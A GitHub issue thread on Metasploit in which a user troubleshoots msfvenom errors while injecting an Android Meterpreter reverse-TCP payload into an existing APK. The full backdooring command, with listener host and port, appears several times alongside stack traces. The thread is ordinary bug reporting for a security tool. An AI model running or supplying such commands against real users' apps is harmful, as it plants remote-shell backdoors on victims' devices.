### ISSUE TITLE
Could not extract signing certificate owner: DOES NOT VERIFY

### ISSUE THREAD

**Issue by Drjacky** [rapid7/metasploit-framework#17610] opened 2023-02-07 15:11 UTC
## Summary
Could not extract signing certificate owner: DOES NOT VERIFY

## Relevant information
```bash
➜  metasploit-framework git:(master) ✗ ./msfvenom -a dalvik --platform android -p android/meterpreter/reverse_tcp -x ~/Desktop/ttt.apk LHOST=192.168.0.150 LPORT=4444 -f raw -o /tmp/ttt-meterpreter.apk
Calling `DidYouMean::SPELL_CHECKERS.merge!(error_name => spell_checker)' has been deprecated. Please call `DidYouMean.correct_error(error_name, spell_checker)' instead.
Using APK template: /Users/userrrr/Desktop/ttt.apk
Error: Could not extract signing certificate owner: DOES NOT VERIFY
ERROR: Missing META-INF/MANIFEST.MF
```

I pulled the apk from the device and it's a working APK; I can install and run it without an issue.

**Comment by gwillcox-r7** [comment] 2023-02-07 22:06
Without the APK there is not much we can do to attempt to replicate this issue. I'd also mention that if the application doesn't have a MANIFEST file then that would likely be an oddity at the very least; I think the code expects that file to exist as noted by the error `ERROR: Missing META-INF/MANIFEST.MF`.

**Comment by bcoles** [comment] 2023-02-20 10:10
Which APK are you using?

What is the output of:

```
keytool -J-Duser.language=en -printcert -jarfile ~/Desktop/ttt.apk
```

```
apksigner verify --print-certs ~/Desktop/ttt.apk
```

**Comment by Drjacky** [comment] 2023-02-24 12:06
@bcoles I added `, signature = false)` to `/opt/homebrew/share/metasploit-framework/lib/msf/core/payload_generator.rb` -> `raw_payload = apk_backdoor.backdoor_apk(template, generate_raw_payload` and got this:
```
➜  metasploit-framework git:(master) ✗ ./msfvenom -a dalvik --platform android -p android/meterpreter/reverse_tcp -x ~/Desktop/ttt.apk LHOST=192.168.0.150 LPORT=4444 -f raw -o /tmp/ttt-meterpreter.apk

Using APK template: /Users/drjacky/Desktop/ttt.apk
Error: Could not extract signing certificate owner: DOES NOT VERIFY
ERROR: Missing META-INF/MANIFEST.MF
```

**Comment by bcoles** [comment] 2023-02-24 12:25
Are you using two different versions of Metasploit? It looks like you're running `./msfvenom` from within a git repository, but updated the library in `/opt/homebrew`.

**Comment by Drjacky** [comment] 2023-02-24 13:44
No, all of them are in `/opt/homebrew/share/metasploit-framework/` as I have this in my zshrc:
```bash
eval "$(rbenv init - zsh)"
alias msfconsole="/opt/homebrew/share/metasploit-framework && ./msfconsole && cd -"
alias msfbinscan="/opt/homebrew/share/metasploit-framework && ./msfbinscan && cd -"
alias msfd="/opt/homebrew/share/metasploit-framework && ./msfd && cd -"
alias msfelfscan="/opt/homebrew/share/metasploit-framework && ./msfelfscan && cd -"
alias msfmachscan="/opt/homebrew/share/metasploit-framework && ./msfmachscan && cd -"
alias msfpescan="/opt/homebrew/share/metasploit-framework && ./msfpescan && cd -"
alias msfrop="/opt/homebrew/share/metasploit-framework && ./msfrop && cd -"
alias msfrpc="/opt/homebrew/share/metasploit-framework && ./msfrpc && cd -"
alias msfrpcd="/opt/homebrew/share/metasploit-framework && ./msfrpcd && cd -"
alias msfupdate="/opt/homebrew/share/metasploit-framework && ./msfupdate && cd -"
alias msfvenom="/opt/homebrew/share/metasploit-framework && ./msfvenom && cd -"
```

**Comment by bcoles** [comment] 2023-02-24 13:56
> No, all of them are in `/opt/homebrew/share/metasploit-framework/` as I have this in my zshrc:

Do you have two copies of Metasploit? Have you edited the correct file for the version of Metasploit you're executing?

**Comment by Drjacky** [comment] 2023-02-24 16:36
No, only one. Yes, I double checked:
<img width="760" alt="Screenshot 2023-02-24 at 16 36 22" src="https://user-images.githubusercontent.com/2296754/221235039-2ef7c780-98a1-408f-999f-efafa074f58f.png">
<img width="929" alt="Screenshot 2023-02-24 at 16 36 40" src="https://user-images.githubusercontent.com/2296754/221235115-d88af304-e6d7-4939-a3b4-56e08eac46ff.png">

**Comment by Drjacky** [comment] 2023-02-24 17:03
Running it like: `bundle exec ./msfvenom -a dalvik --platform android -p android/meterpreter/reverse_tcp -x ~/Desktop/ttt.apk LHOST=192.168.0.150 LPORT=4444 -f raw -o /tmp/ttt-meterpreter.apk` worked. Thanks!

But anyway it failed:
```java
[*] Rebuilding apk with meterpreter injection as /var/folders/4c/13yp5nx15q1_vfhb_cswvjt00000gn/T/d20230224-8812-glgijc/output.apk
[-] I: Using Apktool 2.7.0
I: Checking whether sources has changed...
I: Smaling smali folder into classes.dex...
Exception in thread "main" org.jf.util.ExceptionWithContext: Exception occurred while writing code_item for method Landroidx/annotation/InspectableProperty$ValueType;->values()[Landroidx/annotation/InspectableProperty$ValueType;
	at org.jf.dexlib2.writer.DexWriter.writeDebugAndCodeItems(DexWriter.java:1058)
	at org.jf.dexlib2.writer.DexWriter.writeTo(DexWriter.java:354)
	at org.jf.dexlib2.writer.DexWriter.writeTo(DexWriter.java:309)
	at brut.androlib.src.SmaliBuilder.build(SmaliBuilder.java:58)
	at brut.androlib.src.SmaliBuilder.build(SmaliBuilder.java:37)
	at brut.androlib.Androlib.buildSourcesSmali(Androlib.java:437)
	at brut.androlib.Androlib.buildSources(Androlib.java:368)
	at brut.androlib.Androlib.build(Androlib.java:320)
	at brut.androlib.Androlib.build(Androlib.java:287)
	at brut.apktool.Main.cmdBuild(Main.java:263)
	at brut.apktool.Main.main(Main.java:82)
Caused by: org.jf.util.ExceptionWithContext: Error while writing instruction at code offset 0x2
	at org.jf.dexlib2.writer.DexWriter.writeCodeItem(DexWriter.java:1331)
	at org.jf.dexlib2.writer.DexWriter.writeDebugAndCodeItems(DexWriter.java:1054)
	... 10 more
Caused by: org.jf.util.ExceptionWithContext: Unsigned short value out of range: 65538
	at org.jf.dexlib2.writer.DexDataWriter.writeUshort(DexDataWriter.java:116)
	at org.jf.dexlib2.writer.InstructionWriter.write(InstructionWriter.java:356)
	at org.jf.dexlib2.writer.DexWriter.writeCodeItem(DexWriter.java:1291)
	... 11 more

Error: apktool execution failed
```

**Comment by gwillcox-r7** [comment] 2023-02-24 17:28
Crashes in apktool should probably be reported to https://github.com/iBotPeaches/Apktool. Good to know you managed to get this working on the `msfvenom` side of things though.

**Comment by Drjacky** [comment] 2023-02-24 17:59
I'm gonna report it there but, @bcoles already created one in this repo:
https://github.com/rapid7/metasploit-framework/issues/16338

**Comment by bcoles** [comment] 2023-02-25 03:18
> Unsigned short value out of range

This is a known issue and won't be fixed in `apktool`. There is currently no intention to fix it in `msfvenom` either.

**Comment by Drjacky** [comment] 2023-02-25 12:02
[just to help, giving an idea]
These have their own decompiler: https://github.com/androguard/androguard

**Comment by bcoles** [comment] 2023-03-19 02:23
The original question has been answered.

The remaining DEX limit issue is a dupe of #16338. There is currently no plan to resolve this in `msfvenom`. Closing.

**Closed by bcoles** 2023-03-19 02:23 UTC
Labels: android, question
